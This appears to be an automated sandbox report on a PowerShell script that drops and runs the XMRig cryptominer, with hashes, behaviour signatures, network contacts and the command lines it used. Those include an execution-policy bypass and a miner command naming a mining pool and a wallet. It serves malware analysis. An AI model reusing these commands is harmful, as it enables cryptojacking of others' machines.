| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2676-25-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-48-0x000002508E370000-0x000002508E382000-memory.dmp
memory/2676-61-0x000002508E340000-0x000002508E34A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2516-90-0x0000020679870000-0x0000020679890000-memory.dmp
memory/2516-91-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2676-92-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp
memory/2516-93-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2676-94-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-95-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-96-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2516-97-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-98-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-99-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-100-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-101-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-102-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-103-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-104-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-105-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-106-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-107-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-108-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-109-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-110-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-111-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-112-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-113-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-114-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-115-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-116-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-117-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-118-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-119-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-120-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-121-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-122-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-123-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-124-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-125-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-126-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-127-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-128-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-129-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-130-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-131-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-132-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-133-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-134-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-135-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-136-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-137-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-138-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-139-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-140-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-141-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-142-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-143-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-144-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-145-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-146-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-147-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-148-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-149-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-150-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-151-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-152-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-153-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-154-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-155-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-156-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-157-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:26
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4000 wrote to memory of 4252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4000 wrote to memory of 4252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/4000-0-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21vrwc5i.d2c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4000-10-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-11-0x000001A67FA50000-0x000001A67FA72000-memory.dmp
memory/4000-12-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-13-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-15-0x000001A67FA80000-0x000001A67FA92000-memory.dmp
memory/4000-16-0x000001A67FA30000-0x000001A67FA3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4252-47-0x0000024415970000-0x0000024415990000-memory.dmp
memory/4252-48-0x00000244159C0000-0x00000244159E0000-memory.dmp
memory/4252-49-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4000-50-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
memory/4000-51-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4252-52-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-54-0x0000024415A00000-0x0000024415A20000-memory.dmp
memory/4252-53-0x00000244159E0000-0x0000024415A00000-memory.dmp
memory/4000-55-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4252-56-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-57-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-59-0x0000024415A00000-0x0000024415A20000-memory.dmp
memory/4252-58-0x00000244159E0000-0x0000024415A00000-memory.dmp
memory/4252-60-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-61-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-62-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-63-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-64-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-65-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-66-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-67-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-68-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-69-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-70-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-71-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-72-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-73-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-74-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-75-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-76-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-77-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-78-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-79-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-80-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-81-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-82-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-83-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-84-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-85-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-86-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-87-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-88-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-89-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-90-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-91-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-92-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-93-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-94-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-95-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-96-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-97-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-98-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-99-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-100-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-101-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-102-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-103-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-104-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-105-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-106-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-107-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-108-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-109-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-110-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-111-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-112-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-113-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-114-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-115-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-116-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-117-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-118-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:31
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 988 wrote to memory of 2096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 988 wrote to memory of 2096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/988-0-0x00007FF815A93000-0x00007FF815A95000-memory.dmp
memory/988-1-0x000001A6C5640000-0x000001A6C5662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzl1sp4v.zvi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/988-10-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-11-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-12-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-14-0x000001A6C56D0000-0x000001A6C56E2000-memory.dmp
memory/988-15-0x000001A6C56B0000-0x000001A6C56BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2096-46-0x0000019226370000-0x0000019226390000-memory.dmp
memory/2096-47-0x0000019227E40000-0x0000019227E60000-memory.dmp
memory/2096-48-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/988-49-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/2096-51-0x0000019227E80000-0x0000019227EA0000-memory.dmp
memory/2096-50-0x0000019227E60000-0x0000019227E80000-memory.dmp
memory/988-54-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/2096-52-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/988-53-0x00007FF815A93000-0x00007FF815A95000-memory.dmp
memory/2096-55-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-56-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-58-0x0000019227E80000-0x0000019227EA0000-memory.dmp
memory/2096-57-0x0000019227E60000-0x0000019227E80000-memory.dmp
memory/2096-59-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-60-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-61-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-62-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-63-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-64-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-65-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-66-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-67-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-68-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-69-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-70-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-71-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-72-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-73-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-74-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-75-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-76-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-77-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-78-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-79-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-80-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-81-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-82-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-83-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-84-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-85-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-86-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-87-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-88-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-89-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-90-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-91-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-92-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-93-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-94-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-95-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-96-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-97-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-98-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-99-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-100-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-101-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-102-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-103-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-104-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-105-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-106-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-107-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-108-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-109-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-110-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-111-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-112-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-113-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-114-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-115-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-116-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-117-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
